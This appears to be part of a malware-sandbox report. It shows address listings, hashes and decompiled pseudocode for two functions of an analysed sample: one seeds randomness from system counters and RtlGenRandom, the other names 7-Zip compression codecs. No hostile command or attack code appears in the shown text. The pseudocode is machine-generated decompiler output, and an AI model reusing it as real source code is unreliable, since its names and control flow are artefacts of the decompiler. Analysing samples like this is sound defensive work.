                                                                                                                    0x00b467f5
                                                                                                                    0x00000000
                                                                                                                    0x00b467f5
                                                                                                                    0x00b46774
                                                                                                                    0x00b46774
                                                                                                                    0x00b46775
                                                                                                                    0x00b467ce
                                                                                                                    0x00b467d1
                                                                                                                    0x00b467d5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b467d7
                                                                                                                    0x00b467da
                                                                                                                    0x00000000
                                                                                                                    0x00b467da
                                                                                                                    0x00b46777
                                                                                                                    0x00b4677a
                                                                                                                    0x00b4679e
                                                                                                                    0x00b467a1
                                                                                                                    0x00b467a5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b467ab
                                                                                                                    0x00b467af
                                                                                                                    0x00b467b6
                                                                                                                    0x00b467bf
                                                                                                                    0x00b467c4
                                                                                                                    0x00b467c8
                                                                                                                    0x00000000
                                                                                                                    0x00b467c8
                                                                                                                    0x00b46784
                                                                                                                    0x00b4678f
                                                                                                                    0x00b46791
                                                                                                                    0x00b46793
                                                                                                                    0x00b469c0
                                                                                                                    0x00b469c5
                                                                                                                    0x00000000
                                                                                                                    0x00b469c5
                                                                                                                    0x00000000
                                                                                                                    0x00b46799
                                                                                                                    0x00b4665b
                                                                                                                    0x00b4666a
                                                                                                                    0x00b4666d
                                                                                                                    0x00b4666f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46675
                                                                                                                    0x00b46678
                                                                                                                    0x00b4667a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46680
                                                                                                                    0x00b46682
                                                                                                                    0x00b46684
                                                                                                                    0x00b46687
                                                                                                                    0x00b466b4
                                                                                                                    0x00b466b7
                                                                                                                    0x00b46701
                                                                                                                    0x00b46701
                                                                                                                    0x00b46705
                                                                                                                    0x00b469b6
                                                                                                                    0x00b469b6
                                                                                                                    0x00000000
                                                                                                                    0x00b469b6
                                                                                                                    0x00b4670b
                                                                                                                    0x00b4670f
                                                                                                                    0x00b46742
                                                                                                                    0x00b466a7
                                                                                                                    0x00b466a7
                                                                                                                    0x00000000
                                                                                                                    0x00b466ae
                                                                                                                    0x00b4671c
                                                                                                                    0x00b4672c
                                                                                                                    0x00000000
                                                                                                                    0x00b4672c
                                                                                                                    0x00b466bc
                                                                                                                    0x00b466c7
                                                                                                                    0x00b466ce
                                                                                                                    0x00b466cf
                                                                                                                    0x00b466d4
                                                                                                                    0x00b466d6
                                                                                                                    0x00b466e5
                                                                                                                    0x00b466e5
                                                                                                                    0x00b466e7
                                                                                                                    0x00b466e7
                                                                                                                    0x00b466ef
                                                                                                                    0x00b466f3
                                                                                                                    0x00b466f8
                                                                                                                    0x00b466fb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b466fb
                                                                                                                    0x00b46689
                                                                                                                    0x00b4668d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b46696
                                                                                                                    0x00b4669a
                                                                                                                    0x00b466a7
                                                                                                                    0x00000000
                                                                                                                    0x00b46601
                                                                                                                    0x00b46603
                                                                                                                    0x00b46612
                                                                                                                    0x00b46619
                                                                                                                    0x00b4662d
                                                                                                                    0x00b46634
                                                                                                                    0x00b4663a
                                                                                                                    0x00b46985
                                                                                                                    0x00b46985
                                                                                                                    0x00b46985
                                                                                                                    0x00b46634
                                                                                                                    0x00b4698a
                                                                                                                    0x00b4698a
                                                                                                                    0x00b46990
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: fputs$H_prolog
                                                                                                                    • String ID: @$data:
                                                                                                                    • API String ID: 2614055831-1130426132
                                                                                                                    • Opcode ID: cea326a155072943c5d4ffdf112beaca155738f26324b2ea75f383f03a8904f1
                                                                                                                    • Instruction ID: 03f3cab959d5c7f7433c2e069607db867f4d3e2c9939707ff2fdb5276bcda909
                                                                                                                    • Opcode Fuzzy Hash: cea326a155072943c5d4ffdf112beaca155738f26324b2ea75f383f03a8904f1
                                                                                                                    • Instruction Fuzzy Hash: 4BD1B471A0020AEFCF15DFA4D984AEDB7F5FF5A304F2444AAE445A3191EB30AE44DB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B6ADA0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 84libraryloaderthreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E00B6ADA0(void* __ecx, void* __eflags) {
				void* _t34;
				_Unknown_base(*)()* _t36;
				struct HINSTANCE__* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t64 = __ecx;
				E00B7E910(_t66 + 0x1c);
				_t65 = 0x3e8;
				 *(_t66 + 0x14) = GetCurrentProcessId();
				L00B7EF30(_t66 + 0x20, _t66 + 0x14, 4);
				 *(_t66 + 0x14) = GetCurrentThreadId();
				L00B7EF30(_t66 + 0x20, _t66 + 0x14, 4);
				_t62 = LoadLibraryW(L"advapi32.dll");
				if(_t62 != 0) {
					_t36 = GetProcAddress(_t62, "SystemFunction036");
					if(_t36 != 0) {
						_push(0x20);
						_push(_t66 + 0x9c);
						if( *_t36() != 0) {
							_t65 = 0x64;
							L00B7EF30(_t66 + 0x20, _t66 + 0xa0, 0x20);
						}
					}
					FreeLibrary(_t62);
				}
				do {
					if(QueryPerformanceCounter(_t66 + 0x14) != 0) {
						L00B7EF30(_t66 + 0x20, _t66 + 0x18, 8);
					}
					 *(_t66 + 0x14) = GetTickCount();
					L00B7EF30(_t66 + 0x20, _t66 + 0x14, 4);
					_t63 = 0x64;
					do {
						L00B7EFC0(_t66 + 0x1c, _t64);
						E00B7E910(_t66 + 0x1c);
						L00B7EF30(_t66 + 0x20, _t64, 0x20);
						_t63 = _t63 - 1;
					} while (_t63 != 0);
					_t65 = _t65 - 1;
				} while (_t65 != 0);
				_t34 = L00B7EFC0(_t66 + 0x1c, _t64);
				 *((char*)(_t64 + 0x20)) = 0;
				return _t34;
			}










                                                                                                                    0x00b6ada9
                                                                                                                    0x00b6adb0
                                                                                                                    0x00b6adb5
                                                                                                                    0x00b6adca
                                                                                                                    0x00b6adce
                                                                                                                    0x00b6ade3
                                                                                                                    0x00b6ade7
                                                                                                                    0x00b6adf7
                                                                                                                    0x00b6adfb
                                                                                                                    0x00b6ae03
                                                                                                                    0x00b6ae0b
                                                                                                                    0x00b6ae14
                                                                                                                    0x00b6ae16
                                                                                                                    0x00b6ae1b
                                                                                                                    0x00b6ae2a
                                                                                                                    0x00b6ae2f
                                                                                                                    0x00b6ae2f
                                                                                                                    0x00b6ae1b
                                                                                                                    0x00b6ae35
                                                                                                                    0x00b6ae35
                                                                                                                    0x00b6ae41
                                                                                                                    0x00b6ae4e
                                                                                                                    0x00b6ae5a
                                                                                                                    0x00b6ae5a
                                                                                                                    0x00b6ae6b
                                                                                                                    0x00b6ae6f
                                                                                                                    0x00b6ae74
                                                                                                                    0x00b6ae79
                                                                                                                    0x00b6ae7f
                                                                                                                    0x00b6ae88
                                                                                                                    0x00b6ae95
                                                                                                                    0x00b6ae9a
                                                                                                                    0x00b6ae9a
                                                                                                                    0x00b6ae9d
                                                                                                                    0x00b6ae9d
                                                                                                                    0x00b6aea6
                                                                                                                    0x00b6aeab
                                                                                                                    0x00b6aeb9

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00B9A8F8), ref: 00B6ADBA
                                                                                                                      • Part of subcall function 00B7EF30: memcpy.MSVCRT ref: 00B7EF5F
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B6ADD3
                                                                                                                      • Part of subcall function 00B7EF30: memcpy.MSVCRT ref: 00B7EF7B
                                                                                                                      • Part of subcall function 00B7EF30: memcpy.MSVCRT ref: 00B7EFB0
                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,00000004,?,00B9A8F8), ref: 00B6ADF1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SystemFunction036), ref: 00B6AE03
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00B9A8F8), ref: 00B6AE35
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,00B9A8F8), ref: 00B6AE46
                                                                                                                    • GetTickCount.KERNEL32 ref: 00B6AE5F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$CurrentLibrary$AddressCountCounterFreeLoadPerformanceProcProcessQueryThreadTick
                                                                                                                    • String ID: SystemFunction036$advapi32.dll$N)w
                                                                                                                    • API String ID: 3940253874-2334367241
                                                                                                                    • Opcode ID: ff477ff1c6fa366e7df8ec5c4be9b75041a25b4ed15a8b56cc546e67791d4033
                                                                                                                    • Instruction ID: f2c462d2afe1a9ba028795faa722f34bf2102f6e9b15d17e366c2b6f9409ccff
                                                                                                                    • Opcode Fuzzy Hash: ff477ff1c6fa366e7df8ec5c4be9b75041a25b4ed15a8b56cc546e67791d4033
                                                                                                                    • Instruction Fuzzy Hash: A931B3312143029BDB10FB20E845BAA73E4FFD4704F104D98F5A56B1A5EE39DA09CB53
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B58834 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 347COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 99%
                                                                                                                    			E00B58834(void* __ecx) {
				void* __edi;
				intOrPtr _t170;
				signed int _t173;
				void* _t174;
				signed int _t175;
				signed int _t176;
				void* _t179;
				signed int _t186;
				char* _t189;
				signed int _t190;
				char* _t193;
				char* _t194;
				char* _t195;
				signed int _t197;
				char* _t199;
				void* _t202;
				signed int _t206;
				signed int _t218;
				signed int _t221;
				void* _t223;
				void* _t224;
				void* _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				intOrPtr _t233;
				void* _t243;
				signed int _t245;
				char* _t246;
				intOrPtr* _t248;
				signed char _t249;
				char _t252;
				void* _t256;
				void* _t261;
				signed int _t262;
				signed int _t264;
				char _t267;
				signed int _t268;
				void* _t269;
				signed int _t290;
				signed int _t291;
				void* _t297;
				signed char* _t298;
				signed int _t299;
				void* _t300;
				signed int _t302;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				void* _t307;

				L00B7F140(0xb87684, _t307);
				L00B1933B( *((intOrPtr*)(_t307 + 0xc)));
				_t262 =  *(_t307 + 8);
				if(_t262 != 0xffffffff) {
					_t170 =  *((intOrPtr*)(__ecx + 0xe8));
					 *(_t307 - 0x61) =  *(_t307 - 0x61) & 0x00000000;
					_t233 =  *((intOrPtr*)(_t170 + _t262 * 4));
					 *(_t307 - 0x24) =  *(_t307 - 0x24) & 0x00000000;
					_t221 = 0xff;
					 *(_t307 - 0x14) = 0xff;
					 *((intOrPtr*)(_t307 - 0x2c)) =  *((intOrPtr*)(__ecx + 0xec)) + _t233;
					 *((intOrPtr*)(_t307 - 0x28)) =  *((intOrPtr*)(_t170 + 4 + _t262 * 4)) - _t233;
					_t173 = L00B5B088(_t307 - 0x2c, _t262, __eflags);
					 *(_t307 + 0xb) =  *(_t307 + 0xb) & 0x00000000;
					 *(_t307 - 0x30) = _t173;
					__eflags = _t173;
					if(_t173 == 0) {
						L82:
						_t174 = L00B19194( *((intOrPtr*)(_t307 + 0xc)), _t307 + _t221 - 0x160);
						goto L83;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						__eflags = _t221 - 0x20;
						if(_t221 < 0x20) {
							break;
						}
						_t175 = E00B5AEFF(_t307 - 0x2c);
						_t264 =  *(_t307 - 0x24);
						 *(_t307 - 0x15) = _t175;
						_t176 = _t175 & 0x0000000f;
						__eflags = _t176;
						 *(_t307 - 0x34) = _t176;
						 *(_t307 - 0x20) = 0;
						 *(_t307 - 0x1c) = 0;
						_t297 = _t264 +  *((intOrPtr*)(_t307 - 0x2c));
						 *(_t307 - 0x10) = 0;
						if(_t176 <= 0) {
							L7:
							 *(_t307 - 0x24) =  *(_t307 - 0x24) +  *(_t307 - 0x34);
							__eflags =  *(_t307 - 0x15) & 0x00000010;
							if(__eflags != 0) {
								L00B5B088(_t307 - 0x2c, _t264, __eflags);
								L00B5B088(_t307 - 0x2c, _t264, __eflags);
							}
							_t179 = 0;
							_t298 = 0;
							__eflags =  *(_t307 - 0x15) & 0x00000020;
							if(__eflags != 0) {
								_t179 = L00B5B088(_t307 - 0x2c, _t264, __eflags);
								_t55 = _t307 - 0x24;
								 *_t55 =  *(_t307 - 0x24);
								__eflags =  *_t55;
								_t298 =  *(_t307 - 0x24) +  *((intOrPtr*)(_t307 - 0x2c));
							}
							 *(_t307 - 0x60) =  *(_t307 - 0x60) & 0x00000000;
							__eflags =  *(_t307 - 0x1c);
							if(__eflags > 0) {
								L68:
								E00B126D9(_t307 - 0x40);
								 *(_t307 - 4) =  *(_t307 - 4) & 0x00000000;
								E00B1A5F1(_t307 - 0x40,  *(_t307 - 0x20),  *(_t307 - 0x1c));
								__eflags =  *(_t307 + 0xb);
								if( *(_t307 + 0xb) != 0) {
									_t221 = _t221 - 1;
									__eflags = _t221;
									 *((char*)(_t307 + _t221 - 0x160)) = 0x20;
								}
								_t299 =  *(_t307 - 0x3c);
								__eflags = _t299;
								if(_t299 != 0) {
									_t182 = _t299 + 5;
									__eflags = _t299 + 5 - _t221;
									if(_t299 + 5 > _t221) {
										E00B11E89(_t182,  *((intOrPtr*)(_t307 - 0x40)));
										break;
									}
									_t221 = _t221 - _t299;
									_t184 = 0;
									__eflags = _t299;
									 *(_t307 - 0x14) = _t221;
									if(_t299 <= 0) {
										goto L76;
									}
									_t243 = _t307 + _t221 - 0x160;
									do {
										 *((char*)(_t243 + _t184)) =  *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t307 - 0x40))));
										_t184 = _t184 + 1;
										__eflags = _t184 - _t299;
									} while (_t184 < _t299);
									goto L76;
								} else {
									_t221 = _t221 - E00B58326(_t307 + _t221 - 0x160,  *(_t307 - 0x20),  *(_t307 - 0x1c));
									 *(_t307 - 0x14) = _t221;
									L76:
									 *(_t307 - 4) =  *(_t307 - 4) | 0xffffffff;
									E00B11E89(_t184,  *((intOrPtr*)(_t307 - 0x40)));
									L66:
									_t124 = _t307 - 0x30;
									 *_t124 =  *(_t307 - 0x30) - 1;
									__eflags =  *_t124;
									 *(_t307 + 0xb) = 1;
									if( *_t124 != 0) {
										continue;
									}
									goto L82;
								}
							}
							if(__eflags < 0) {
								L14:
								_t245 =  *(_t307 - 0x20);
								__eflags = _t245 - 0x30101;
								if(_t245 != 0x30101) {
									__eflags = _t245 - 0x21;
									if(_t245 != 0x21) {
										__eflags = _t245 - 0x30401;
										if(_t245 != 0x30401) {
											__eflags = _t245 - 3;
											if(_t245 != 3) {
												__eflags = _t245 - 0xa;
												if(_t245 != 0xa) {
													__eflags = _t245 - 0x303011b;
													if(_t245 != 0x303011b) {
														__eflags = _t245 - 0x3030103;
														if(_t245 != 0x3030103) {
															__eflags = _t245 - 0x6f10701;
															if(_t245 != 0x6f10701) {
																goto L68;
															}
															__eflags = _t179 - 1;
															 *(_t307 - 0x10) = "7zAES";
															if(_t179 < 1) {
																L24:
																_t186 =  *(_t307 - 0x10);
																__eflags = _t186;
																if(_t186 == 0) {
																	goto L68;
																}
																_t267 =  *_t186;
																_t300 = 0;
																__eflags = _t267;
																if(_t267 == 0) {
																	L27:
																	_t226 = 0;
																	__eflags =  *(_t307 - 0x60);
																	if( *(_t307 - 0x60) == 0) {
																		L29:
																		__eflags = _t226;
																		_t290 = _t226 + _t300;
																		if(_t226 != 0) {
																			_t290 = _t290 + 1;
																			__eflags = _t290;
																		}
																		__eflags =  *(_t307 + 0xb);
																		if( *(_t307 + 0xb) != 0) {
																			_t290 = _t290 + 1;
																			__eflags = _t290;
																		}
																		__eflags = _t290 + 5 -  *(_t307 - 0x14);
																		if(_t290 + 5 >=  *(_t307 - 0x14)) {
																			_t221 =  *(_t307 - 0x14);
																			break;
																		} else {
																			 *(_t307 - 0x14) =  *(_t307 - 0x14) - _t290;
																			_t246 =  *(_t307 - 0x10);
																			_t189 = _t307 +  *(_t307 - 0x14) - 0x160;
																			 *_t189 = _t267;
																			_t190 = _t189 + 1;
																			__eflags = _t190;
																			while(1) {
																				_t246 =  &(_t246[1]);
																				__eflags = _t267;
																				if(_t267 == 0) {
																					break;
																				}
																				_t267 =  *_t246;
																				 *_t190 = _t267;
																				_t190 = _t190 + 1;
																			}
																			__eflags = _t226;
																			if(_t226 == 0) {
																				L63:
																				__eflags =  *(_t307 + 0xb);
																				if( *(_t307 + 0xb) != 0) {
																					_t290 = _t290 +  *(_t307 - 0x14);
																					__eflags = _t290;
																					 *((char*)(_t307 + _t290 - 0x161)) = 0x20;
																				}
																				_t221 =  *(_t307 - 0x14);
																				goto L66;
																			}
																			_t193 = _t307 + _t300 +  *(_t307 - 0x14) - 0x160;
																			 *_t193 = 0x3a;
																			_t194 = _t193 + 1;
																			 *_t194 =  *(_t307 - 0x60);
																			_t195 = _t194 + 1;
																			__eflags =  *(_t307 - 0x60);
																			_t248 = _t307 - 0x5f;
																			if( *(_t307 - 0x60) == 0) {
																				goto L63;
																			} else {
																				goto L62;
																			}
																			do {
																				L62:
																				_t268 =  *_t248;
																				 *_t195 = _t268;
																				_t195 = _t195 + 1;
																				_t248 = _t248 + 1;
																				__eflags = _t268;
																			} while (_t268 != 0);
																			goto L63;
																		}
																	} else {
																		goto L28;
																	}
																	do {
																		L28:
																		_t226 = _t226 + 1;
																		__eflags =  *((char*)(_t307 + _t226 - 0x60));
																	} while ( *((char*)(_t307 + _t226 - 0x60)) != 0);
																	goto L29;
																} else {
																	goto L26;
																}
																do {
																	L26:
																	_t300 = _t300 + 1;
																	__eflags =  *((char*)(_t300 + _t186));
																} while ( *((char*)(_t300 + _t186)) != 0);
																goto L27;
															}
															_t269 = _t307 - 0x60;
															_t197 =  *_t298 & 0x0000003f;
															__eflags = _t197;
															_t249 = _t197;
															L59:
															L00B118F6(_t249, _t269);
															goto L24;
														}
														 *(_t307 - 0x10) = "BCJ";
														goto L24;
													}
													 *(_t307 - 0x10) = "BCJ2";
													goto L24;
												}
												__eflags = _t179 - 4;
												 *(_t307 - 0x10) = 0xb895c0;
												if(_t179 != 4) {
													goto L24;
												}
												_t249 =  *_t298;
												_t269 = _t307 - 0x60;
												goto L59;
											}
											__eflags = _t179 - 1;
											 *(_t307 - 0x10) = 0xb8e9a8;
											if(_t179 != 1) {
												goto L24;
											}
											_t269 = _t307 - 0x60;
											_t249 = ( *_t298 & 0x000000ff) + 1;
											goto L59;
										}
										__eflags = _t179 - 5;
										 *(_t307 - 0x10) = "PPMD";
										if(_t179 != 5) {
											goto L24;
										}
										 *(_t307 - 0x60) = 0x6f;
										_t290 = ":mem";
										_t199 = L00B118F6( *_t298 & 0x000000ff, _t307 - 0x5f);
										_t252 = ":mem"; // 0x3a
										while(1) {
											__eflags = _t252;
											 *_t199 = _t252;
											if(_t252 == 0) {
												break;
											}
											_t252 =  *(_t290 + 1);
											_t290 = _t290 + 1;
											_t199 = _t199 + 1;
										}
										E00B58609(_t199, _t298[1], _t290);
										goto L24;
									}
									__eflags = _t179 - 1;
									 *(_t307 - 0x10) = 0xb8e990;
									if(_t179 == 1) {
										E00B5867B(_t307 - 0x60,  *_t298 & 0x000000ff);
									}
									goto L24;
								}
								__eflags = _t179 - 5;
								 *(_t307 - 0x10) = "LZMA";
								if(_t179 == 5) {
									_t202 = E00B58609(_t307 - 0x60, _t298[1], _t290);
									_t302 =  *_t298 & 0x000000ff;
									__eflags = _t302 - 0x5d;
									_t256 = _t202;
									if(_t302 != 0x5d) {
										_t291 = 9;
										_t303 = 9;
										_t227 = 5;
										_t290 = _t302 % _t291;
										_t206 = _t302 / _t303;
										_t228 = _t206 / _t227;
										_t305 = 5;
										__eflags = _t290 - 3;
										_t306 = _t206 % _t305;
										if(_t290 != 3) {
											_t256 = E00B58C82(_t256, "lc", _t290);
										}
										__eflags = _t306;
										if(_t306 != 0) {
											_t256 = E00B58C82(_t256, "lp", _t306);
										}
										__eflags = _t228 - 2;
										if(_t228 != 2) {
											E00B58C82(_t256, "pb", _t228);
										}
										_t221 =  *(_t307 - 0x14);
									}
								}
								goto L24;
							}
							__eflags =  *(_t307 - 0x20) - 0xffffffff;
							if( *(_t307 - 0x20) > 0xffffffff) {
								goto L68;
							}
							goto L14;
						} else {
							goto L5;
						}
						goto L7;
						L5:
						_t261 = 8;
						asm("cdq");
						_t229 = _t264;
						_t264 =  *(_t307 - 0x1c);
						_t218 = L00B7F480( *(_t307 - 0x20), _t261, _t264);
						 *(_t307 - 0x10) =  &(( *(_t307 - 0x10))[1]);
						 *(_t307 - 0x20) = ( *(_t307 - 0x10))[_t297] & 0x000000ff | _t218;
						 *(_t307 - 0x1c) = _t229 | _t264;
						__eflags =  *(_t307 - 0x10) -  *(_t307 - 0x34);
						if( *(_t307 - 0x10) <  *(_t307 - 0x34)) {
							goto L5;
						} else {
							_t221 =  *(_t307 - 0x14);
							goto L7;
						}
					}
					__eflags =  *(_t307 - 0x30);
					if( *(_t307 - 0x30) != 0) {
						__eflags = _t221 - 4;
						if(_t221 >= 4) {
							_t223 = _t221 - 1;
							 *((char*)(_t307 + _t223 - 0x160)) = 0x20;
							_t224 = _t223 - 1;
							 *((char*)(_t307 + _t224 - 0x160)) = 0x2e;
							_t225 = _t224 - 1;
							 *((char*)(_t307 + _t225 - 0x160)) = 0x2e;
							_t221 = _t225 - 1;
							__eflags = _t221;
							 *((char*)(_t307 + _t221 - 0x160)) = 0x2e;
						}
					}
					goto L82;
				} else {
					_t174 = 0;
					L83:
					 *[fs:0x0] =  *((intOrPtr*)(_t307 - 0xc));
					return _t174;
				}
			}






















































                                                                                                                    0x00b58839
                                                                                                                    0x00b5884a
                                                                                                                    0x00b5884f
                                                                                                                    0x00b58855
                                                                                                                    0x00b5885e
                                                                                                                    0x00b58864
                                                                                                                    0x00b5886f
                                                                                                                    0x00b58876
                                                                                                                    0x00b5887a
                                                                                                                    0x00b58887
                                                                                                                    0x00b5888a
                                                                                                                    0x00b5888d
                                                                                                                    0x00b58890
                                                                                                                    0x00b58895
                                                                                                                    0x00b58899
                                                                                                                    0x00b5889c
                                                                                                                    0x00b5889e
                                                                                                                    0x00b58c62
                                                                                                                    0x00b58c6c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b588a4
                                                                                                                    0x00b588a4
                                                                                                                    0x00b588a4
                                                                                                                    0x00b588a7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b588b0
                                                                                                                    0x00b588b5
                                                                                                                    0x00b588b8
                                                                                                                    0x00b588bd
                                                                                                                    0x00b588bd
                                                                                                                    0x00b588c0
                                                                                                                    0x00b588c6
                                                                                                                    0x00b588c9
                                                                                                                    0x00b588cc
                                                                                                                    0x00b588cf
                                                                                                                    0x00b588d2
                                                                                                                    0x00b58906
                                                                                                                    0x00b58909
                                                                                                                    0x00b5890c
                                                                                                                    0x00b58910
                                                                                                                    0x00b58915
                                                                                                                    0x00b5891d
                                                                                                                    0x00b5891d
                                                                                                                    0x00b58922
                                                                                                                    0x00b58924
                                                                                                                    0x00b58926
                                                                                                                    0x00b5892a
                                                                                                                    0x00b5892f
                                                                                                                    0x00b5893a
                                                                                                                    0x00b5893a
                                                                                                                    0x00b5893a
                                                                                                                    0x00b5893d
                                                                                                                    0x00b5893d
                                                                                                                    0x00b58940
                                                                                                                    0x00b58944
                                                                                                                    0x00b58948
                                                                                                                    0x00b58ba3
                                                                                                                    0x00b58ba6
                                                                                                                    0x00b58bae
                                                                                                                    0x00b58bb8
                                                                                                                    0x00b58bbd
                                                                                                                    0x00b58bc1
                                                                                                                    0x00b58bc3
                                                                                                                    0x00b58bc3
                                                                                                                    0x00b58bc4
                                                                                                                    0x00b58bc4
                                                                                                                    0x00b58bcc
                                                                                                                    0x00b58bcf
                                                                                                                    0x00b58bd1
                                                                                                                    0x00b58bec
                                                                                                                    0x00b58bef
                                                                                                                    0x00b58bf1
                                                                                                                    0x00b58c28
                                                                                                                    0x00000000
                                                                                                                    0x00b58c2d
                                                                                                                    0x00b58bf3
                                                                                                                    0x00b58bf5
                                                                                                                    0x00b58bf7
                                                                                                                    0x00b58bf9
                                                                                                                    0x00b58bfc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58bfe
                                                                                                                    0x00b58c05
                                                                                                                    0x00b58c0b
                                                                                                                    0x00b58c0e
                                                                                                                    0x00b58c0f
                                                                                                                    0x00b58c0f
                                                                                                                    0x00000000
                                                                                                                    0x00b58bd3
                                                                                                                    0x00b58be5
                                                                                                                    0x00b58be7
                                                                                                                    0x00b58c13
                                                                                                                    0x00b58c16
                                                                                                                    0x00b58c1a
                                                                                                                    0x00b58b91
                                                                                                                    0x00b58b91
                                                                                                                    0x00b58b91
                                                                                                                    0x00b58b91
                                                                                                                    0x00b58b94
                                                                                                                    0x00b58b98
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58b9e
                                                                                                                    0x00b58bd1
                                                                                                                    0x00b5894e
                                                                                                                    0x00b5895a
                                                                                                                    0x00b5895a
                                                                                                                    0x00b5895d
                                                                                                                    0x00b58963
                                                                                                                    0x00b58a51
                                                                                                                    0x00b58a54
                                                                                                                    0x00b58a72
                                                                                                                    0x00b58a78
                                                                                                                    0x00b58ac0
                                                                                                                    0x00b58ac3
                                                                                                                    0x00b58ade
                                                                                                                    0x00b58ae1
                                                                                                                    0x00b58afa
                                                                                                                    0x00b58b00
                                                                                                                    0x00b58b0e
                                                                                                                    0x00b58b14
                                                                                                                    0x00b58b22
                                                                                                                    0x00b58b28
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58b2a
                                                                                                                    0x00b58b2d
                                                                                                                    0x00b58b34
                                                                                                                    0x00b589ea
                                                                                                                    0x00b589ea
                                                                                                                    0x00b589ed
                                                                                                                    0x00b589ef
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b589f5
                                                                                                                    0x00b589f7
                                                                                                                    0x00b589f9
                                                                                                                    0x00b589fb
                                                                                                                    0x00b58a04
                                                                                                                    0x00b58a04
                                                                                                                    0x00b58a06
                                                                                                                    0x00b58a09
                                                                                                                    0x00b58a13
                                                                                                                    0x00b58a13
                                                                                                                    0x00b58a15
                                                                                                                    0x00b58a18
                                                                                                                    0x00b58a1a
                                                                                                                    0x00b58a1a
                                                                                                                    0x00b58a1a
                                                                                                                    0x00b58a1b
                                                                                                                    0x00b58a1f
                                                                                                                    0x00b58a21
                                                                                                                    0x00b58a21
                                                                                                                    0x00b58a21
                                                                                                                    0x00b58a25
                                                                                                                    0x00b58a28
                                                                                                                    0x00b58c30
                                                                                                                    0x00000000
                                                                                                                    0x00b58a2e
                                                                                                                    0x00b58a2e
                                                                                                                    0x00b58a31
                                                                                                                    0x00b58a37
                                                                                                                    0x00b58a3e
                                                                                                                    0x00b58a40
                                                                                                                    0x00b58a40
                                                                                                                    0x00b58a41
                                                                                                                    0x00b58a41
                                                                                                                    0x00b58a42
                                                                                                                    0x00b58a44
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b58a4a
                                                                                                                    0x00b58a4c
                                                                                                                    0x00b58a4e
                                                                                                                    0x00b58a4e
                                                                                                                    0x00b58b4e
                                                                                                                    0x00b58b50
                                                                                                                    0x00b58b7b
                                                                                                                    0x00b58b7b
                                                                                                                    0x00b58b7f
                                                                                                                    0x00b58b84
                                                                                                                    0x00b58b84
                                                                                                                    0x00b58b86
                                                                                                                    0x00b58b86
                                                                                                                    0x00b58b8e
                                                                                                                    0x00000000
                                                                                                                    0x00b58b8e
                                                                                                                    0x00b58b57
                                                                                                                    0x00b58b5e
                                                                                                                    0x00b58b64
                                                                                                                    0x00b58b65
                                                                                                                    0x00b58b67
                                                                                                                    0x00b58b68
